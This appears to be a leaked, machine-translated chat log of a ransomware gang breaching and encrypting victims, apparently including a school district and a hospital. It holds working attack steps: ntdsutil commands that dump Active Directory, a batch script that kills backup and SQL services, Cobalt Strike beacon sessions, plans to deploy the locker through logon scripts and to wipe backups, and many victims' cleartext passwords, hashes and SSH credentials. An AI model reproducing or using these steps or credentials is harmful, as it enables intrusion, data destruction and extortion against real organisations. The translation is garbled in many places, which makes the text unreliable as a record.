archive.sisd.net 216.171.94.95
www2.sisd.net 216.171.94.96 Windows Microsoft-IIS 10.0 IIS Windows Server
ftp.sisd.net 216.171.94.101 Windows Microsoft-IIS 8.5 ASP.NET IIS Windows Server
support.sisd.net 216.171.94.102 Apache Socorro Independent School District
connect.sisd.net 216.171.94.133 Apache Connect SISD
``I'll take the hashes and put them into a confu-file, upload it to a file-sharing site and send me the local ip or the external one will be lit pinging from inside the domain
ftp.sisd.net
´´you have yes, trying to download ptdr.net´´ see hp5 min can already be installed, take the ntds and while under this account and look for 2 quiet godforsaken servers without avs and other stuff.´´you have it yes? account from kerba you already account yes? ok. wait for the speed, unlike cobalt, there is no speed limit, better via armitage about 8-10 hours
just a long time will be pumping Listen, and koba 637 meters download? and that's how long it all, maybe it does not download, and I'm waiting...okshnyal, downloaded, made myself a token yes and jumped away to the silent servers I will issue a fast do nashuyuchit muchesnimi just in case it looks like yes you probably stopped the service during execution now can pick up filesvot it seems true ` ` `.
ntdsutil: ac in ntds
Active instance set to "ntds".
ntdsutil: ifm
ifm: cr fu c:\windows\temp\ntds
Creating snapshot...
Snapshot set {feb986c1-384e-4798-8a98-320359ac7bf8} generated successfully.
Snapshot {d21d04b5-cff8-4f62-a308-9318ca9ae6d9} mounted as C:\$SNAP_202012020302_VOLUMEC$\
Snapshot {d21d04b5-cff8-4f62-a308-9318ca9ae6d9} is already mounted.
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202012020302_VOLUMEC$\Windows\NTDS\ntds.dit
     Target Database: c:\windows\temp\ntds\Active Directory\ntds.dit

                  Defragmentation Status (% complete)

          0 10 20 30 40 50 60 70 80 90 100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

Copying registry files...
Copying c:\windows\temp\ntds\registry\SYSTEM
Copying c:{windows\temp\ntds\registry\SECURITY
 error 0x800706ba(The RPC server is unavailable.)
 error 0x800706ba(The RPC server is unavailable.)
 error 0x800706ba(The RPC server is unavailable.)
IFM media created successfully in c:{windows\temp\ntds
ifm: q
ntdsutil: q

It will directly say 100 it will write when it makes a full backup, wait, it says something else...ndsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q give the bicon output after it worked outda two folders and one has two files in itwas output after it worked out ntdsutil?vss service stopped I want to compress ndts.dit `c:\windows\temp\ntds\Active Directory\ntds.dit : The process cannot access the file because it is being used by another process.
`oki I'll throw in two pins and wait for ntdsda I noticed) that's what long interruptions do) well there's one in the forum
sc query vss
sc start vss
ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\ntds" q q
sc stop vss
If not then in both places do you make notes right now on the forum and in your personal notes no info?) remind me how, because we only tried once, I think, and that did not work) take it off via ptdstuidler no ``
[+] Determining what EDR products are installed on localhost...
[+] host called home, sent: 57 bytes
[+] No EDR products found! Operate at your own risk!
``I'm on dk pod token c$ balloon vindo on dk? yes, to the server jumped valid? dcsync for some reason for 20 sec hesitates and does not return anything. What would that mean?
$krb5tgs$23$*sccmadmin$admin.sisd.k12$MSSQLSvc/SCCM-SQL.admin.sisd.k12 juliet25-
``So, let me give you access to 2 domains at once one. @user7 there are 2 more people on the way to where the second?)and where is the other half?)helloHiHiHiVi never keep more than 10-15 active sessionsokwhen you need to do related work in 4.1client do not deleteadam 4.2 go to finally? +okay, then all have 4.2 cleaneno 4.2 I also haveona 4.1 in my kobe yesterday closed gofer?:heavy_plus_sign:+ everybody have coba 4.2?:heavy_plus_sign:+++tasks are clear to all? hello there:space_invader:add me to my colleagues in the confabs let's write from one dude to another about pass from nimbla[ ](https://mediaeveryone.com/channel/general?msg=a7bE4sNqbM6uRkvJG) flows against the current[ ](https://mediaeveryone.com/channel/general?msg=3YDeQbYx3iq2NzQik) what? in water is unusual scheme we close two networks at once?
there's a couple of people in the water who are neurotic, they go to these nimbles, but they don't save their passwords anywhere.
once again on the computers/servers went through\to the browsers files with passwords and what were you doing? how are you getting on? google help)[ ](https://mediaeveryone.com/channel/general?msg=QPvucTEsDKGjawem2) is this something that already exists, or do you have to do? which can overwrite a network drive a few times console fileshredder[ ](https://mediaeveryone.com/channel/general?msg=xNu8E3Moc2RP4oAJv) and more? to overwrite backups if it doesn't encrypt[ ](https://mediaeveryone.com/channel/general?msg=YW4zCCrXYpf7Q7Hvu) go to ssh and rm -rf-prepare more filehreddertoday I'll try over the garbage if lin will allow. it's pretty neutered there or check their disks all?we've been mashing them and mashing them and mashing them and mashing them and mashing them and mashing them and mashing them. we still haven't updated to 10[ ](https://mediaeveryone.com/channel/general?msg=Y9hzbFuc43vehpwWG) to all esx? We have to look at the confab first, clarify what lin systems are there? there is a skul, there is mail (one), there are listings and files, there is access to esx all or not all at #rtpcompany-com more precisely say without like in #rtpcompany-com *almost* everything is ready
in #waterway-com the skool is rolled out, there's a problem with the mail, there's a problem with backupsBackups on the mega have not goneBackups are trying to take off
no 445 anywhere, only backups are visible on the nasa for nowHow is the work progressing?hi all hello thereafter, we are trying to remove the backups from the mega in the water, let it pour in the mega in the water, and do not confuse which one or what and the mega we leave in the water in the slipIt turns out that piripezd sometimes in the mouth cleaner even missthink only water then okada it missklik in the water now .you misinform me in rt all yes only water and rt and water while loading? no in rt all unloaded? would not want to leave the mega there it's all very interesting, but can we wrap it up already today?
I'm sleepy.
Everything's ready for the rtp.
i've got everything on the water except for the backups, i'll have until 3 tomorrow just to deal with itTiny whisper BDSM it's the windup's job to sufferSo let it stay like that)Good for you too generous rating "Fragile "It's not fragile, it's just fucked up. It's better for everything but dota and pbna.
Fuck the windup.
```
of course fuck it, you can see how fragile it is) maybe. i don't even know why it's allowed for rdp
maybe it's because it's a "remote" service if you could do that there'd be a lot of conflicts Fuck the windup... but it's the windup... i know it's stupid...
it's vindaKuryu i understand that you're googling now, well when you finish googling please tell me what you found in the repository of knowledge it's a fixed protocol, not a service that you can deploy anywhere else all the rest is forward on nix - you could on vinda) seriously?)
you will ALWAYS have reception on the smb on 2 ports
read the documentation)
```
Googling))) not changing the port is portfwd It is possible to configure port mapping on the nasa
Everything can be changed
```
read the documentation)) is a medal the last two messages - on bash.org unequivocally and no matter what it will not work everything can be changed I'm not even fucking sure that it changes in the wind in general) ok not change the port in AD
and then guess
which one is smb
which is the rdp
how will it work without smb? for example diskshare...psezek? but what's that to us dastmik also does not work[ ](https://mediaeveryone.com/channel/general?msg=3xDH4WufyJHjSg3X6) now the cards will point the way no idea, it's too complicated this time which rdb which of them smb to guess potomotnite 1 to 65535)mb port have changed[ ](https://mediaeveryone.com/channel/general?msg=Jy7qoefNuXnWSgxhx) thoughts on the subject? these remained+tok with the backups listings left in the water
can not remove because there is no rdp or smb ports loaded on the megutak what do you have? yes it ssh ?
root:glp151yQA92Abu7WIAYw@23.106.160.212:35985
this is ssh in half an hour and will be taken down soon, guys, anyone with anything important left in their tpsh take it away, it will crash the next time they try to network locate as soon as the file locating process starts it will get a flag hanging on it right away no
it does not conflict with each other? if from two servers, conditionally, will come to 1 arm where 1 has already started the process
but if it's everywhere off then why not? it will work if you turn off the Aver by itself it's possible to do so
for example from a SYSVOL balloon which is available by default to all machines domainedr can it kill? and maybe add to the batter, that at the end it would download the locker from some balloon and run? it does not conflict with each other? if two servers, so to speak, will come to 1 arm where 1 has already started the process run it without arguments and the locker will start scanning the network for available balls as it finishes locking "in itself" on the machine as you can see it slows down services and kills peeps who can hold handls + shares drives ```
"C:\Windows\system32\net1 stop \"samss\" /y"
"C:\Windows\system32\net1 stop \""veeamcatalogsvc\"" /y"
"C:\Windows\system32\net1 stop \""veeamcloudsvc\"" /y"
"C:\Windows\system32\net1 stop \""veeamdeploysvc\"" /y"
"C:\Windows\System32\net.exe\" stop \""samss\""/y"
"C:\Windows\System32\net.exe\" stop \""veeamcatalogsvc\"" /y"
"C:\Windows\System32\net.exe\" stop \""veeamcloudsvc\"" /y"
"C:\Windows\System32\net.exe\" stop \""veeamdeploysvc\"" /y"
"C:\Windows\System32\taskkill.exe\" /IM sqlbrowser.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM sqlceip.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM sqlservr.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM sqlwriter.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.agent.configurationservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.brokerservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.catalogdataservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.cloudservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.externalinfrastructure.dbprovider.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.manager.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.mountservice.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.service.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.uiserver.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.backup.wmiserver.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamdeploymentsvc.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamfilesysvsssvc.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeam.guest.interaction.proxy.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamnfssvc.exe /F"
"C:\Windows\System32\taskkill.exe\"" /IM veeamtransportsvc.exe /F"
"C:\Windows\system32\taskmgr.exe\"" /4"
"C:\Windows\system32\wbem\wmiprvse.exe -Embedding"
"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"
"icacls \""C:\*\" /grant Everyone:F /T /C /Q"
"icacls \""D:\*\"" /grant Everyone:F /T /C /Q"
``This is an example of "prelok" batnick let's hope they won't eat it)) he has some kind of toolkit there or is it shellconcat too? in this network semantics is vicious while his loads work da, does the new coba come already?
172.241.27.18
https://agesk.com
----------------------------------------------------------------------------------------
209.222.97.8:62460
TnRLaHoRRRwyezbn6ybP1ed1xRlhtnAQAM5o
``Let's keep looking for access to the population parral'naya guys uchut access to nas+1obuschem how to get into trusts in #wilsonart-com:space_invader:who do what? helloThank you guys, please throw sharkhromium build can certainly login with rockyu let ...what other exploits can try under ftp?
anonomus and login with passwords you found does not work
10.103.1.13:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready.)

10.103.1.19:21 (220 NET+ARM FTP Server 1.0 ready.)

10.100.1.107:21 (220 Microsoft FTP Service)

10.100.1.25:21 (220 Microsoft FTP Service)

10.100.1.11:21 (220 Microsoft FTP Service)

10.100.1.4:21 (220 Microsoft FTP Service)

10.109.1.51:21 (220 ET0021B73B05EA Lexmark M3150 FTP Server NH63.CY.N640 ready)

10.100.20.15:21 (220-FileZilla Server version 0.9.44 beta)

10.104.1.13:21 (220 AP9630 Network Management Card AOS v6.0.6 FTP server ready).

10.101.1.6:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready).

10.101.1.13:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready).

10.106.1.54:21 (220 POSOfficeInvoice Lexmark M3150 FTP Server NH63.CY.N640 ready.)

10.106.1.15:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready).

10.106.1.9:21 (220 AP9630 Network Management Card AOS v6.2.0 FTP server ready).

10.122.1.47:21 (220 ZBR-79071 Version V75.19.10Z ready.)

10.122.1.50:21 (220 EFI FTP Print server ready.)
``````
[-] 10.103.1.108:445 - Host does NOT appear vulnerable.
``````
10.103.1.108:445 (platform: 500 version: 6.1 name: BL19 domain: ORANGE_FACT)
10.250.1.41:445 (platform: 500 version: 6.3 name: CFD01 domain: ORANGE_FACT)
10.109.1.21:445 (platform: 500 version: 6.3 name: TL02 domain: ORANGE_FACT)
10.100.20.15:445 (platform: 500 version: 6.3 name: OC40 domain: ORANGE_FACT)
``user8 add @user8 to the chat room I'm the only one here now)
can I have
slypad.com:443 who pass? there is a session, most likely goes to `CORPSFEAPP05 ` as will be turned on the VPN check the `CORP.TELEVISA.COM.MX\cguerrerobo Televisa *2020 ` did not have time to check the cress, turned off the VPN-as the other mount, which I did on the server does not roll? or he never came + putzakrepreshit hangs yesByla would not miss the sparrows.I confused with balya stopya see in the cob session from there hangsa why bother me and the extra light zakrepnu tell me thatThere is no time, valenok at the computer includes vpn for a couple of minutes. As soon as we jump I'll reporta only 1perekiruyte on the server somewherePulni plzodaZakrep weighs? -little if@tl2 @tl1 and at least some hashik unloaded ?VPN enabled for a short time.Here progress is not great, looking for an accessible server that would hook up, unloaded Firefox now will look at the deadic, maybe some accesses will find #sccy-com
#ballymoregroup-com
and something else I had nothing to do with what's in the works today? I'll keep you posted on how it will go from here. no, most of the servers are off, those that are not - encrypted network did not rollback? hi)hi, check the old network? no, what the hell have you changed in the settings, and I have not collected again. probably because of the vpn, later check it, strange, I'm quiet.
{
    { "bit": "64",
    { "core": "shellStarter_llvm.dll",
    { "flags": "self"
}
``````
https://ws4nrdkwmjbxrv56pn4knxaex6ttwnjbdrshd6gfq2hw324ugwlgwfad.onion

CreepingDeath
2e30528eeafa9152666b89fabd9ac914
``npsps''
23.81.246.16
https://hdavail.com
----------------------------------------------------------------------------------------
64.187.238.58:27616
3vj63jL9oSHB4nYYg0e2C44AapdZ095IsFS
``At a glance, you're talking about... stalin and user8 are working in it now who took it? water what's it got to do with it? is it dead or did someone else take it under water or where? under work what exactly? can you be more specific? under work... nothing is flying in mine under what? the date you used yesterday? yes there are clean kobs? from deadick is drawn, but otherwise no[ ](https://mediaeveryone.com/channel/general?msg=egNgG9m4nGZggDsk2) no ?[ ](https://mediaeveryone.com/channel/general?msg=5hJjTn62neuBcoHf4) i'm intrigued... And the hour has passed alreadyNo flying sessions did not helpThis time we'll all get together on a small bering about the next weekbut in general they may not need soonernae anything) on zakrepov .... a zakrepov? + updated the files in tulsa, there Detect 4/23 on the dynamics instead of 9/23started in these two ways
regsvr32 file.dll
rundll32 file.dll, StartW
``Disassemble I have all x64? ok, 4 then, it's better to have in reserve in tv as well
but just in case it's your only chance to clean the load 2 shellcoats that's it? i'll give you a couple more vpn's in work 2 pcs? all? send me a shellcoat i'll give it as an archive but i can clean it by hand at least by tulsam, dudes come by, but computers are not domain so it's hard to get there. i have dumped hashes tl2, maybe when will unload ...on sccy silence? i have a TV and user7 helps
sccy in pcsb we troetools cleaned? 1 with tv and 1 with pcsb? the same as yesterday)who's working with what today?:space_invader:helloWe're all goodbye to 6x by tomorrowLet's get the horses)user1poca off, alas there kerbs, you'll be swathed and the farm is still off? add @user1otleetla more
i did not take any unwanted action last 15 minutes before i died on ms17-010 empty
beacon> shell net localgroup administrators
[*] Tasked beacon to run: net localgroup administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
dennadmin
dennisadmin
localadmin
ORENCO\Domain Admins
The command completed successfully.


beacon> shell net group "Domain admins" /dom
[*] Tasked beacon to run: net group "Domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain orenco.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
0renco ADadmin ADAM_OrencoAD-LDS
ADCS-CertSvc ADCS-NDESSvc ADCS-WebSvc
bdehaven bmehrabian esherman
ExchangeAdmin hodges JLyons
jperez mark.dupuis SCCM01$
sdawson
The command completed successfully.


beacon> shell net group "Enterprise admins" /dom
[*] Tasked beacon to run: net group "Enterprise admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain orenco.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
095 bmehrabian ExchangeAdmin
hodges
The command completed successfully.
``tl2otuser9 mails, fs, socials look more and you looked at the tech guys all? brutal did not give anything (brutalized esx looking for web faces the ability to rub the backups there is movement? -[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=X2EtTJvtHPYtbkq7a) @tl1 have you encountered this? took a screenshot of the admin desktop
there was an etp console open, he was just restoring
No credits.
He stole a cookie and then he logged in.
10.1.0.170
```
because they go by ip https://10.1.0.170/web/bin/index.html and only one user tell me where you find it now how did you see it?) there is another backup system Rubrik
not cloudy not a clue here ... you need to automatically generate all combinations with pass and cvr+special characters, the guy has passwords like - pass123 pass123@ passl23# and so on random password generator? you ask about a password manager? What's a tool that generates passwords based on a pattern i checked, but i couldn't find them.
look at the sphere ... you did a scan of the network how did you find them? ie fucked up only in esx? what do you mean completely?
i see there fs and everything is shifty there is available? if not you are wasting your time is vim server available?
Cool2002!
@#Jackson09!
V8tundra!
!@#monstrosity2002!
crisp31015
cool2002
JbQp3Fjq9mUa
EvaiKiO1!

``https://github.com/Arvanaghi/SessionGopher```
	 * Username : rthomas
	 * Domain : MAIN
	 * Password : !@monstrosity2002
``2 what part was it? no, these are not in adiz* of them? didn't understand the question, for them?[ ](https://mediaeveryone.com/group/1-done-crispregional-org?msg=Ycb785mrfeQYmw9LH) some part for them? some in the domain were they in the domain? yes? forgot them?)``
crhsesxi20.main.crispregional.org
crhsesxi21.main.crispregional.org
crhsesxi22.main.crispregional.org
crhsesxi23.main.crispregional.org
crhsesxi24.main.crispregional.org
crhsesxi25.main.crispregional.org
crhsesxi26.main.crispregional.org
crhsesxi27.main.crispregional.org
``````
MAIN\Administrator cr1spy173
MAIN\Allscripts_Admin crisp1234
MAIN\AllscriptsSQL Cr1spy173
MAIN\htservice Hyp3rtap3
MAIN\meditech-admin meditech12
MAIN\meditech meditech12
MAIN\nodom Miranda22
MAIN\dragon Cr1spy173
MAIN\jwashburn1 Nestlr99
MAIN\pbodrey rocket48
MAIN\smaxwell retire17
MAIN\ashleys Ashley!23
MAIN\rlagrone goose2001
MAIN\spf_svcs cr1spy173
MAIN\helpdesk Crisp@123
MAIN\blove wingnut12#
``1.done.CRISPREGIONAL.ORG thank you bbbbok))) you go to 12 you can go satiitogo +4 hours on top of everything zbsagaSame went after the 1742 gb jammed what did you do?the process went faster1742 gb or through ehei and then try to limit the size and run separately to the folder again check av and vindefmonitor this casebut in 3 hoursI'm trying to get on the rdp to the server from which you can go to the admin, 500gb file has changed the extension of what?[ ](https://mediaeveryone.com/group/crispregional-org?msg=bgPCbwvFmfMwjop8L) kobadai access to the coba still check the aver to startParameter in the argument??[ ](https://mediaeveryone.com/group/crispregional-org?msg=j2fFkWHhYy2nrZtpa) inject, with the parameter E:\ -size 25 and then put dll again on the backpack admin maqafi suddenly turned on and before that the exe was ok? processes hangs on? see the maqafaa what is it? it is demolished start it throw the exe
beacon> shell dir C:\
[*] Tasked beacon to run: dir C:\
[+] host called home, sent: 38 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 88D0-688E

 Directory of C:\

01/22/2021 01:06 AM 1,558 .rnd.YHCWU
01/22/2021 01:06 AM 1,790 Dailly Backup_Subplan_1_20160715120154.txt.id-B4E852BA.[emailme@italymail.com].arena.YHCWU
01/22/2021 01:06 AM 14,885 eula_en.txt.YHCWU
12/30/2015 08:47 AM 66 install x64.bat
01/22/2021 01:06 AM 10,815 legal_notices.txt.txt.YHCWU
08/22/2013 10:52 AM <DIR> PerfLogs
01/22/2021 01:07 AM <DIR> Program Files
01/22/2021 01:07 AM <DIR> Program Files (x86)
01/22/2021 01:06 AM 3,194 RakhniDecryptor.1.21.2.1_15.10.2017_23.13.34_log.txt.YHCWU
10/15/2017 10:13 PM 5,463,192 RakhniDecryptor.exe
01/22/2021 01:06 AM 930 readme.txt
01/22/2021 01:07 AM <DIR> Users
01/22/2021 01:07 AM <DIR> VBRCatalog
01/22/2021 01:07 AM <DIR> VeeamBackup&Replication_9.5.0.1038.Update2
01/22/2021 01:07:07 AM 679,073,953 VeeamBackup&Replication_9.5.0.1038.Update2.zip.YHCWU
01/22/2021 01:07 AM 2,158,762,518 VeeamBackup&Replication_9.5.0.823.Update1.iso.YHCWU
01/22/2021 01:07 AM <DIR> VeeamFLR
01/22/2021 01:07 AM 1,913 veeam_backup_perpetual_32_0.lic.YHCWU
01/21/2021 11:26 PM <DIR> Windows
01/22/2021 01:07 AM 10,576 zabbix_agentd.conf.YHCWU
01/22/2021 01:07 AM 664,700 zabbix_agentd.log.YHCWU
01/22/2021 01:07 AM <DIR> Zabbix_x64
              13 File(s) 2,844,010,090 bytes
               9 Dir(s) 20,071,145,472 bytes free

``or the exe file in the root of the drive dlli look at the root of the disk I can't answer you this srevak did user9 and all conversations will be about this server here? Where did you run the exe file? fuck+[ ](https://mediaeveryone.com/group/crispregional-org?msg=YHZuQdkuoSaaD7kQy) from here the 500gb file has changed its extension?
*{\] Tasked beacon to run: dir E:\
[+] host called home, sent: 38 bytes
[+] received output:
 Volume in drive E is Backups
 Volume Serial Number is 1AB1-05F7

 Directory of E:\

01/22/2021 02:37 AM <DIR> American HealthTech
01/22/2021 02:41 AM <DIR> Cobian
01/22/2021 03:01 AM <DIR> Corepoint
01/22/2021 03:01 AM <DIR> Corepoint DB Cluster
01/22/2021 03:01 AM <DIR> Deleted 3M CDIS Old
01/19/20/2021 08:42 PM <DIR> Deleted Allscripts Pro
01/21/2021 01:01 PM <DIR> Deleted FollowMyHealth
12/30/2020 02:46 PM <DIR> Deleted IPS Servers
01/21/2021 12:05 PM <DIR> Deleted Meditech MU Servers
01/21/2021 01:03 PM <DIR> Deleted Meditech OlahPDFViewer
12/30/2020 02:24 PM <DIR> Deleted Meditech Servers
12/30/2020 03:16 PM <DIR> Deleted Old vCenter Servers
12/30/2020 01:42 PM <DIR> Deleted Redoc
12/30/2020 03:29 PM <DIR> IPeople Servers
10/15/2019 07:10 AM <DIR> IT Infrastructure Servers
12/30/2020 12:36 PM <DIR> Kronos
10/15/2019 08:14 AM <DIR> Meditech Server Snapshots - 1 Time
05/12/2020 01:27 PM <DIR> ProgramData
08/05/2018 09:07 PM <DIR> Provation
01/22/2021 01:06 AM 930 readme.txt
05/15/2020 09:01 PM <DIR> VeeamAgentUser6940465c-6f53-11e8-9c43-bc0000e00000
10/06/2016 09:00 AM <DIR> VeeamConfigBackup
               1 File(s) 930 bytes
              21 Dir(s) 5,198,023,389,184 bytes free

``I'm interested in its total say and free spaceday dir E:\ Pure bullshit! But there is clearly more said 30 min = 1tbrealistically a long time so, you have backups on the wine server and there you have a session? I do not understand you, I am on this PC) Where do I take it? Ie you also ran the build there? disk with backups attached or notbear> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.

There are no entries in the list. It shows the attached disks see if there is no 2 TB Voz can be attached somewhere, I did not do it.The disk is attached? how much is the total size occupied? It goes to a small size there is movement? if not, let's run with -size25 or stands in place there is movement on the files? -size[10/15/20/25/30/35/40/45/50/60/70/80]
This parameter defines how much % of the file will be encrypted (by default 50%), the file is encrypted in different places in chunks.
In this case, the database is encrypted at 100%, the files in the vm at 20% regardless of the value of the parameter.there close and all day Saturday bye)and Saturday will be finished tomorrow at work time #ballymoregroup-com weekend is the ssk?) but the weekend will be freemax at 9[ ](https://mediaeveryone.com/group/crispregional-org?msg=G9La729RHc5vft2wr) can be later? sleep 6 hours then the rest homeI stay as late and 8 + H for those who stay8 for everyone today? how late? so who stays tonight? so whoever stays tonight will just call to check, there's no need for everyone to stay home the rest can go home the main thing is that the syntax is correct yes, with that, but I think it should work faster with 15 let's brainstorm)you run it yourself then I've run it with "-size 15 e:\" from the neighbor's one
is the syntax correct? no files are not changed? does it still have 500gb files on the first folder? is there a live process hanging? are the folders not fully encrypted?to gpd 20-2000gb files and in these folders less than half of the files half of the folders are only small files so far on the second passed 1 disk how many files passed on the backups? das logonscripts finished? on wine servers for example cut off) just then the point of cutting it) and polozak throwing out?
i just see that gpupdate is still hanging on the user
it means he did not accept the update and windef is still on if you force it within 5 minutes to ask about windef
it's not like it's turned off or something.
when you force a gpapdate, it gives the user an alert that the update is applied after it will exit8 tbhad to wait for backups
there are 160 servers in hell
alive 99
closed 99

1,550 armies by hell
479 alive
we unshared the disks, unshared the exe, put it in the logon copy and start exe

the center\nasys have been wiped out
backups in progress
``````
NOVANET
``````
TRINISYSQA-DB
RINISYSQA-APP
``````
CRRHPOMC4
PYXIS-CCE-TEST2
NTOPCERNER
PYXIS-CCE-TEST
3MCDISTEST
NOVANET
IT-ADMIN
ATCOMM
MEDMANAGER
CINTAS
IT-INFO
``Then we're ready to run it? Tell me when you're ready Don't run it yet Unfollow processes\kill processes, just run it
rub one nasa what's left? have you got many left? have you not started yet?
```
Trinisys-A3
Trinisys-A4
Trinisys-A5
Trinisys-A6
Trinisys-A7
Trinisys-A8
``````
CRANEWARE
NTOPng
OMNICELLOld2
``````
itunitynas.main.crispregional.org NAS zamakat \backup,
``````
CorepointMSFTCluster
CorepointSQL
CRANEWARE
crhs-security
CRHSVIEWSECSVR
DIV5
MTSCA
NTOPng
OMNICELLOld2
PYXIS-CCE-PROD
Trinisys-A3
Trinisys-A4
Trinisys-A5
Trinisys-A6
Trinisys-A7
Trinisys-A8
VISONEX
``did not attract
```
10.1.20.250
10.1.20.197
10.1.20.124
10.1.0.40
10.1.20.127
10.1.20.198
10.1.20.162
10.1.0.80
``In that case you format it if they are files of the current machine then do not delete only snappsDo you have virtual machine disks are files?
pth MAIN\Administrator e25c3e50d7638936c2f2ee77eebb1f24 cr1spy173
pth MAIN\Allscripts_Admin 19a1901a003621a6e1abd6edb0e7cf0b
pth MAIN\allscripts_services 19512cc1b7dc97e7e302f34a2245cabe
pth MAIN\AllscriptsSQL 6a8e1d103a88ea3dc2a012d34e544e99
pth MAIN\blove 7bef985313e414bb847c4dcd6c7c6826 wingnut12#
pth MAIN\htservice 0cf803b54e919bc11e75c48ea596eb92
pth MAIN\meditech-admin d28f5c2d3ea915737812fbdeb4ea4c79
pth MAIN\meditech d28f5c2d3ea915737812fbdeb4ea4c79
pth MAIN\nodom 9255c608109b78b60fc048e84b7926aa
pth MAIN\rthomas 6f0b655dac0046d92eb3fec69ba6aece
pth MAIN\tcoppedge 06a1064c70fa0e250e81eddc4f046dacc
pth MAIN\amhs-admin 443abd60ece7cfb885a54fd2ba35ffcb
pth MAIN\dragon 6a8e1d103a88ea3dc2a012d34e544e99
pth MAIN/jwashburn1 fc98da86ebcc76100a0e62c22d0bd2ca
pth MAIN\pbodrey 300249ae0b204470a430295a2dc30a07
pth MAIN\smaxwell 87a628063ebb1e790221800f8ed76d16
pth MAIN\ashleys 4f3d00492c0d5219ba173c26fc1694ef
pth MAIN\MBAM-RW-SVC 04a88994cf7db5a0e8730e4effd73742
pth MAIN\mhiers 3b3000484afdc685a779399548e76d9e
pth MAIN\rlagrone 438eb0f2356b0f16719a307919e583c6
pth MAIN\spf_svcs e25c3e50d7638936c2f2ee77eebb1f24
pth MAIN\helpdesk 0219040d969400d4253ff874683fd9f8

``````
https://crhsvcenter7.main.crispregional.org/ui/

Administrator@main.crispregional.org
cr1spy173
``don't forget to drop the process of whining on the servers, etc@user9 coordinate on the networkn hope vindef not cut, let's so can prescribe in the logon script kst ports 7/9 are also closed everywhere, it seems standard for vol``(D)*FY&(GSDGUVIIYSDOF*^RS*GUTSBG (wakemeonlan not see switched off compounds, but it also falls off
the problem is that the jump generates an echo and we have no signature certificates in cobalt
may react to it and the old one was not there and the old one was deleted? if anything, EXACTLY the script was imported) on the rdp I sit where the jump did not see the notefna jump burned but defender should not stalid ... did not steam today at least not yet) aha seriously? should be cleaner everything is very relative defender steam it) how long does it take for you to reach the jmp?) it works? >* Beacon's 'jump psexec' and 'jump psexec64' commands[ ](https://mediaeveryone.com/group/crispregional-org?msg=ALXZw7dvyA8RBwDCf) yes) or it generates loads itself when you jump and so?[ ](https://mediaeveryone.com/group/crispregional-org?msg=KhnLLye6nY4zyhk2C) it? yes?
how to generate? everything? lol))you have to start a new one lol) no, you have to start a new cobalt and not take a script from it and add it to the old one? you have to add it to the script manager[ ](https://mediaeveryone.com/group/crispregional-org?msg=c5aken5Ld6PtdbKDC) and you can't use it? @user9 because you start it with the old startup, not through the hooke me ok
In the package in the folder
	Cobalt42_v2/Toolkits/artifact/brooks-artifact-kit/
is artifact.cna which must be imported into cobalt to generate internal native loads and staged loads to run.

``Booted so I wrote 15 = 0da and 13 ok just 13 is not as easy to install as 15``(S)*YD(F&T*^SDUYGfDSI&%FUHIG^7` if 15 is bullshit) yes15jdk13
installing the right Java :
	sudo add-apt-repository ppa:linuxuprising/java
	sudo apt install oracle-java15-installer
	
	java -version
	java version "15.0.1" 2020-10-20
	Java(TM) SE Runtime Environment (build 15.0.1+9-18)
	Java HotSpot(TM) 64-Bit Server VM (build 15.0.1+9-18, mixed mode, sharing)
``Upgrade only from Java 13, not so fast we'll unpack your flesh, give us your clean and pristine, so upgrade``
206.221.188.106:63254
edbDkh6n9sCjfeYJLyFby0q5tKCzuscVSnj
``````
206.221.188.106
```
any coba creeds left? can't find it any cleaner than our dlls from tulspanel``.
Artifact Kit is used in the following cases :
	* Attacks -> Packages -> Windows Executable
	* Attacks -> Packages -> Windows Executable (S)
	* Attacks -> Web Drive-by -> Scripted Web Delivery (bitsadmin and exe)
	* Beacon's 'elevate svc-exe' command
	* Beacon's 'jump psexec' and 'jump psexec64' commands
``it's artifact kitego windef not trett e now you can go through jump) what do you mean it cleans? are we going to do it now? we have a coba update that cleans jump and also coba here to work start with servers, dk last but not least@all pull all servers here anyway it's about ARM If you drop AV then so you can turn off windef and unpack exe then work nope no idea but it looks like we'll find it
